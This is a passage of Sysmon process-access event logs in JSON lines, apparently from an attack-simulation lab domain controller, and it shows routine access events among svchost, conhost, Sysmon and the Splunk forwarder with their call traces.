2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001076950300}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.536\r\nSourceProcessGUID: {E2A3D6B1-106F-5F25-0000-00102DF20300}\r\nSourceProcessId: 3780\r\nSourceThreadId: 3748\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 